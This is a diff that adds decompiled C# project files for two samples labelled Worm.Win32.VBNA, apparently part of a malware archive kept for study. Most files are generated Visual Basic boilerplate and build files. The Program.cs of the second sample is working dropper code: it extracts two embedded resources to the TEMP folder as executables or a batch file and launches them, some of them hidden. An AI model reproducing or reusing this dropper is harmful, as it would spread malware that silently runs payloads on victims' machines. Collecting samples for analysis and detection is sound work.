auto-decompiled msil via petikvx

add

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/MyApplication.cs

@@ -0,0 +1,18 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyApplication
+// Assembly: myslideshow, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: AF5E9AD9-B390-4FFC-A57B-ED6607CE3611
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6.exe
+
+using Microsoft.VisualBasic.ApplicationServices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+
+namespace My
+{
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  internal class MyApplication : ApplicationBase
+  {
+  }
+}

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/MyComputer.cs

@@ -0,0 +1,24 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyComputer
+// Assembly: myslideshow, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: AF5E9AD9-B390-4FFC-A57B-ED6607CE3611
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6.exe
+
+using Microsoft.VisualBasic.Devices;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.Diagnostics;
+
+namespace My
+{
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [EditorBrowsable(EditorBrowsableState.Never)]
+  internal class MyComputer : Computer
+  {
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [DebuggerHidden]
+    public MyComputer()
+    {
+    }
+  }
+}

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/MyProject.cs

@@ -0,0 +1,108 @@
+// Decompiled with JetBrains decompiler
+// Type: My.MyProject
+// Assembly: myslideshow, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: AF5E9AD9-B390-4FFC-A57B-ED6607CE3611
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6.exe
+
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.ApplicationServices;
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.CodeDom.Compiler;
+using System.ComponentModel;
+using System.ComponentModel.Design;
+using System.Diagnostics;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace My
+{
+  [HideModuleName]
+  [GeneratedCode("MyTemplate", "8.0.0.0")]
+  [StandardModule]
+  internal sealed class MyProject
+  {
+    private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
+    private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
+    private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
+
+    [HelpKeyword("My.Computer")]
+    internal static MyComputer Computer
+    {
+      [DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.Application")]
+    internal static MyApplication Application
+    {
+      [DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.User")]
+    internal static User User
+    {
+      [DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
+    }
+
+    [HelpKeyword("My.WebServices")]
+    internal static MyProject.MyWebServices WebServices
+    {
+      [DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
+    }
+
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    [MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
+    internal sealed class MyWebServices
+    {
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public override int GetHashCode() => base.GetHashCode();
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      internal new Type GetType() => typeof (MyProject.MyWebServices);
+
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      [DebuggerHidden]
+      public override string ToString() => base.ToString();
+
+      [DebuggerHidden]
+      private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
+
+      [DebuggerHidden]
+      private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public MyWebServices()
+      {
+      }
+    }
+
+    [ComVisible(false)]
+    [EditorBrowsable(EditorBrowsableState.Never)]
+    internal sealed class ThreadSafeObjectProvider<T> where T : new()
+    {
+      internal T GetInstance
+      {
+        [DebuggerHidden] get
+        {
+          if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
+            MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
+          return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
+        }
+      }
+
+      [DebuggerHidden]
+      [EditorBrowsable(EditorBrowsableState.Never)]
+      public ThreadSafeObjectProvider()
+      {
+      }
+    }
+  }
+}

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/Worm.Win32.VBNA.asdo.csproj

@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{CF61F772-BD57-46A7-965D-447D39525F34}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>myslideshow</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>My</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="sdfhusd78fsfsdhf9sdfjsdsdofjisdjcvduhsvh.cs" />
+    <Compile Include="MyApplication.cs" />
+    <Compile Include="MyComputer.cs" />
+    <Compile Include="MyProject.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Worm/Win32/V/Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6/Worm.Win32.VBNA.asdo.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "myslideshow", "Worm.Win32.VBNA.asdo-112f5e8376740739e7c77c6550d5a18e5523dafbc6c59521a69d9c0b81cbcfc6.csproj", "{CF61F772-BD57-46A7-965D-447D39525F34}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{CF61F772-BD57-46A7-965D-447D39525F34}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{CF61F772-BD57-46A7-965D-447D39525F34}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{CF61F772-BD57-46A7-965D-447D39525F34}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{CF61F772-BD57-46A7-965D-447D39525F34}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Worm/Win32/V/Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Worm/Win32/V/Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb/Program.cs

@@ -0,0 +1,67 @@
+// Decompiled with JetBrains decompiler
+// Type: Stub.Program
+// Assembly: ffff, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 1566F557-0A3E-4A54-AC18-86E6E817603E
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb.exe
+
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+namespace Stub
+{
+  internal class Program
+  {
+    public static FileStream F1Stream;
+    public static FileStream F2Stream;
+
+    [DllImport("kernel32.dll")]
+    public static extern bool FreeConsole();
+
+    private static void Main(string[] args)
+    {
+      try
+      {
+        Program.FreeConsole();
+        bool flag1 = false;
+        bool flag2 = false;
+        bool flag3 = false;
+        bool flag4 = false;
+        bool flag5 = false;
+        bool flag6 = false;
+        Stream manifestResourceStream1 = Assembly.GetExecutingAssembly().GetManifestResourceStream("1.txt");
+        byte[] buffer1 = new byte[manifestResourceStream1.Length];
+        manifestResourceStream1.Read(buffer1, 0, buffer1.Length);
+        manifestResourceStream1.Close();
+        Stream manifestResourceStream2 = Assembly.GetExecutingAssembly().GetManifestResourceStream("2.txt");
+        byte[] buffer2 = new byte[manifestResourceStream2.Length];
+        manifestResourceStream2.Read(buffer2, 0, buffer2.Length);
+        Program.F1Stream = !flag2 ? (!flag3 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3", FileMode.Create)) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg", FileMode.Create);
+        Program.F1Stream.Write(buffer1, 0, buffer1.Length);
+        Program.F1Stream.Close();
+        Program.F1Stream.Dispose();
+        Program.F2Stream = !flag4 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.bat", FileMode.Create);
+        Program.F2Stream.Write(buffer2, 0, buffer2.Length);
+        Program.F2Stream.Close();
+        Program.F2Stream.Dispose();
+        Process process1 = new Process();
+        process1.StartInfo.FileName = !flag2 ? (!flag3 ? Environment.GetEnvironmentVariable("TEMP") + "\\1.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3") : Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg";
+        if (flag6)
+          process1.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+        process1.Start();
+        if (flag5)
+          process1.WaitForExit();
+        Process process2 = new Process();
+        process2.StartInfo.FileName = !flag4 ? Environment.GetEnvironmentVariable("TEMP") + "\\2.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\2.bat";
+        if (flag1)
+          process2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+        process2.Start();
+      }
+      catch
+      {
+      }
+    }
+  }
+}

MSIL/Worm/Win32/V/Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb/Worm.Win32.VBNA.b.csproj

@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <AssemblyName>ffff</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>Stub</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="1.txt" />
+    <EmbeddedResource Include="2.txt" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Worm/Win32/V/Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb/Worm.Win32.VBNA.b.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ffff", "Worm.Win32.VBNA.b-124d57d4b4a828d91d646d9b5fdb7683946725e35623b466deff148c982e5cdb.csproj", "{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{033D26C7-43FE-44DB-9177-0F5FF1F2AC0A}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal